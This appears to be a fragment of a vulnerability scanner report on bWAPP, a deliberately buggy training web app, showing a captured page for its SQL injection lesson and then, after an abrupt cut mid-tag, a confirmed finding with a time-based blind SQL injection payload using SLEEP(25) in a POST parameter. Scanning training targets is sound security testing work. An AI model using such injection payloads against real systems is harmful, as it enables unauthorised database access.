Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<!-- <link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects+Daughter"> -->
<link rel="stylesheet" type="text/css" href="stylesheets/stylesheet.css" media="screen" />
<link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" />
<!-- <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script> -->
<script src="js/html5.js"></script>
<title>bWAPP - SQL Injection</title>
</head>
<body>
<header>
<h1>bWAPP</h1>
<h2>an extremely buggy web app !</h2>
</header>
<div id="menu">
<table>
<tr>
<td><a href="portal.php">Bugs</a></td>
<td><a href="password_change.php">Change Password</a></td>
<td><a href="user_extra.php">Create User</a></td>
<td><a href="security_level_set.php">Set Security Level</a></td>
<td><a href="reset.php" onclick="return confirm('All settings will be cleared. Are you sure?');">Reset</a></td>
<td><a href="credits.php">Credits</a></td>
<td><a href="http://itsecgames.blogspot.com" target="_blank">Blog</a></td>
<td><a href="logout.php" onclick="return confirm('Are you sure you want to leave?');">Logout</a></td>
<td><font color="red">Welcome Bee</font></td>
</tr>
</table>
</div>
<div id="main">
<h1>SQL Injection (GET/Select)</h1>
<form action="/bWAPP/sqli_2.php" method="GET">
<p>Select a movie:<select

1.9. /bWAPP/sqli_3.php CONFIRMED
http://itsecgames.com/bWAPP/sqli_

Parameters
Parameter | Type | Value
d | POST | '+(SELECT 1 FROM (SELECT SLEEP(25))A)+'
form | POST | submit

Request
POST /bWAPP/sqli_3.php HTTP/1.1
Cache-Control: no-cache
Referer: http://itsecgames.com/bWAPP/sqli_3.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Languag
